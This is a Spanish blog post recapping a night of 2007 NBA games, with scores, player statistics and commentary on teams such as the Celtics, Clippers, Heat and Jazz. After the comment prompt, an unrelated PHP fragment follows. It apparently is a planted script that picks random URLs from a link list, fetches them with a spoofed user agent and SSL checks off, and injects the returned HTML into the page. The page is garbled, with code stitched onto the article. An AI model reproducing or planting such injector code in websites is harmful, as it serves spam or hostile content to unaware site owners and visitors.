La crónica (7/11/07)

08 de November de 2007 por MagicJohnson32

El espectacular final del Jazz-Cavs fue lo más destacado en otra noche triste para Sonics y Heat, que sólo suman derrotas. También para los Bobcats y los Nuggets, ridiculizados por sus rivales, y Garbajosa, que cada vez juega menos, y ya era difícil; felicidad en cambio para Grizzlies y Blazers, que se estrenaron, y Orlando, Sixers y los imbatidos Celtics y Clippers. Sorprendente es el caso de los angelinos, que se las arreglan para sumar victorias sin su jugador franquicia. Los Hawks también sonríen, pese a que su gran partido ante los Suns apenas lo vieron 6.000 personas en directo.

Vamos con una crónica más detallada de lo que fue la pasada noche.

  • Como para estar enfadado

tjnelson

 

Magic 105 – Raptors 96

Si yo fuese Garbajosa estaría enfadado y preocupado. Anoche, en otra derrota de los Raptors, esta vez en su pista ante los Magic, el madrileño apenas jugó 4 minutos, menos aún de lo que venía participando en anteriores partidos. El equipo canadiense sumó su tercera derrota consecutiva pese a la mejoría de Bosh, autor de un solo punto ante los Celtics y que anoche logró 26 y 10 rebotes. Los Raptors se colocaron por delante a menos de cuatro minutos para el final, pero los de Florida respondieron con ocho puntos consecutivos para asegurarse la victoria. Todo el quinteto de los Magic anotó en dobles figuras, con Rashard Lewis y, sobre todo, Turkoglu a la cabeza. El turco está en un gran momento y anoche permaneció 45 minutos en cancha, en los que logró 24 puntos, 15 rebotes y 6 asistencias. Posiblemente le ayude que está recibiendo de Stan Van Gundy la confianza que Sam Mitchell no le da, ni de lejos, a Garbajosa.

 

  • Los Bobcats vuelven al mundo real

catssixers

 Bobcats 63 – Sixers 94

¿Alguien dijo que los Bobcats habían empezado bien la temporada? En dos noches consecutivas han perdido por 32 ante los Suns y por 31 ante los Sixers. La de anoche en Philadelphia fue especialmente dura ya que necesitaron una última canasta para evitar su anotación más baja, los 62 ante los Rockets hace un año. Sin Felton, lesionado la noche anterior, los Bobcats anduvieron perdidos, cometieron error tras error y detalles como el 6 de 32 en tiros que hicieron entre McInnis, Richardson y Wallace no ayudaron a evitar el 30% con el que acabaron el partido. Matt Carroll, con 16 puntos y 7 de 14 en tiros, se salvó de la quema, mientras que Iguodala fue el encargado de dirigir el paseo para los Sixers con sus 19 puntos, 7 rebotes, 4 asistencias y 5 recuperaciones.

 

  • El enigma Clippers

cassellindiana
Clippers 104 – Pacers 89

No hace mucho, las esperanzas de los Clippers pasaban por la fiabilidad a prueba de bombas de Elton Brand y el potencial del base Shaun Livington. Los angelinos no podrán contar con ninguno de los dos durante un largo tiempo y era difícil pensar que este grupo de jugadores, encabezado por veteranísimos como Cassell, Mobley y Tim Thomas, resultase competitivo. Anoche, para hacerlo más complicado todavía, los Clippers perdieron durante el primer cuarto a Mobley y Patterson. Pues aún así, el cuadro dirigido por Dunleavy se las está ingeniando para ganar todos sus partidos hasta la fecha, y ya van cuatro con la lograda en pista de los Pacers, otro equipo que permanecía invicto. Esta vez fue Sam Cassell quien, con 35 puntos y 8 asistencias, dirigió el triunfo de su equipo, en el que también brilló Kaman (15 puntos y 22 rebotes). El tercer cuarto, parcial de 32-14 para los Clippers, dejó sin opciones a unos Pacers que se parecieron demasiado a los del año pasado. Ahora queda por saber hasta cuándo se mantendrá el enigma de los Clippers y qué equipo será el primero en resolverlo. Hasta ahora, Warriors, Sonics, Bulls y Pacers han fracasado en el intento.

  • El final de dos rachas

 westblazers

Hornets 90 – Blazers 93

Los cambios hicieron efecto. La entrada de Frye y Blake en el quinteto titular dio como fruto la primera victoria para los Blazers, que llegó ante un equipo que parecía en un momento dulce. Tras la exhibición de Stojakovic ante los Lakers, con su 10 de 13 en triples, el serbio dio su peor cara (2 de 13 en tiros). El enorme partido de David West, 34 puntos y 18 rebotes, y el 18-12 de Chris Paul, no bastaron. 20 de Webster y Jack (éste saliendo desde el banquillo), más 17 de Roy y 12 de Aldridge valieron para el triunfo de los de Oregon.

 

  • Motivos para la esperanza

joshcrowd
Suns 96 – Hawks 105

¿Será éste el año en el que, finalmente, los jóvenes Hawks acaben de explotar? Victorias como la de anoche alimentan las esperanzas de sus aficionados, que ven como su equipo se sitúa con un balance de 2-2 pese al complicadísimo arranque de temporada que se le presentaba: Mavericks, Pistons, Nets y, anoche, Phoenix. Los de Georgia aprovecharon la ausencia de Amaré, que era duda y finalmente no jugó, para dominar el rebote (40 de los Suns por 56 de los Hawks, 17 de ellos ofensivos) e imponer su juego agresivo y espectacular. No importó la terrible noche de Joe Johnson con los lanzamientos (3 de 17). Entre Josh Smith, Marvin Williams, Horford y Childress sumaron 69 puntos y 47 rebotes, suficientes para superar la gran actuación de Nash, 34 puntos con 7 de 10 en triples y 11 asistencias. Pero desde el banquillo sólo llegaron los puntos de Barbosa, aunque poco pudieron hacer los otros suplentes, Banks, Marks y Skinner, en los escasos 15 minutos en total de que dispusieron.

 

  • Cuando la excusa ya no vale

rileydown

Heat 78 – Spurs 88

Vale que Wade está lesionado. Pero ¿tan malos son estos Heat como para no haber llegado a 90 puntos en ninguno de los cuatro partidos jugados (y perdidos) hasta ahora? Entre que Ricky Davis acaba de llegar, que Shaq se parece más a un Dampier cualquiera que a sí mismo y que Jason Williams y Smush Parker no son Nash y Kidd (y prometo que es la última vez que mezclo a los dos primeros con los dos últimos), los Heat no ganan ni en los entrenamientos. La pretemporada ya fue un aviso: los Heat, sencillamente, no ganan. Anoche, al menos, dieron guerra a los grandes favoritos al anillo, los Spurs, que necesitaron otra gran actuación de la pareja Parker-Ginóbili: 23 puntos y 8 asistencias del francés; 25 puntos, 7 rebotes y 7 asistencias del argentino; 18 de 29 en tiros entre ambos. Duncan anduvo discreto, 12-8, pero surgió Elson (no es broma) con 12 puntos y 14 rebotes, seis de ellos ofensivos. Y no creo que la baja de Wade tenga la culpa de que Elson atrape 11 rebotes más que O’Neal.

 

  • Los nuevos Celtics ya asustan

newceltics

Celtics 119 – Nuggets 93

Si alguien dudaba de que los nuevos Celtics funcionarían, ya puede empezar a asustarse. Mientras el trío funcione, que será una noche sí y otra, también, este equipo da miedo y ganará partidos con enorme facilidad, como el de anoche en su pista ante los Nuggets. Una vez más, Garnett, Allen y Pierce anotaron más de 20 puntos cada uno en una exhibición ofensiva que en la primera llevaba camino de ser histórica: 77 puntos con un 72% de acierto en tiros de campo. Tan histórica pudo ser para los Celtics como humillante para Denver: a 16 minutos para el final el marcador era 91-50. Por el equipo de Colorado, se mantiene el mal momento de Carmelo, que anoche hizo 11 puntos con 3 de 13 en tiros. Además, Nené, como si no tuviese bastante con andar sobrado de peso, se lesionó. También se retiró del partido por problemas físicos James Posey. Iverson, con 22 puntos, 4 asistencias y 3 robos, fue el mejor nugget.

 

  • Deron Williams robó el protagonismo a LeBron pese al memorable partido de King James

deronjazzwin

 Jazz 103 – Cavs 101

Espectacular encuentro el disputado por Jazz y Cavaliers anoche en Cleveland. Los monstruosos números de LeBron James, 32 puntos, 15 rebotes y 13 asistencias, además de su triple para empatar el partido a seis segundos del final, no bastaron para superar al equipo de Jerry Sloan. Los Jazz sacaron rápidamente de fondo, Deron Williams cruzó la pista y anotó una bandeja con la diestra a falta de un segundo para dar la victoria a los de Salt Lake City, en los que destacó Paul Millsap con su mejor marca anotadora hasta la fecha, 24 puntos en 27 minutos, con 5 rebotes y 5 robos. Boozer añadió 23 y 12 rebotes, mientras que Deron Williams no tuvo su mejor día, 15 con 12 asistencias pero 8 pérdidas de balón. El único punto negro en la actuación de LeBron James, que además aportó 3 robos y 2 tapones, fue que volvió a tener serios problemas con los tiros libres: 7 de 15

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>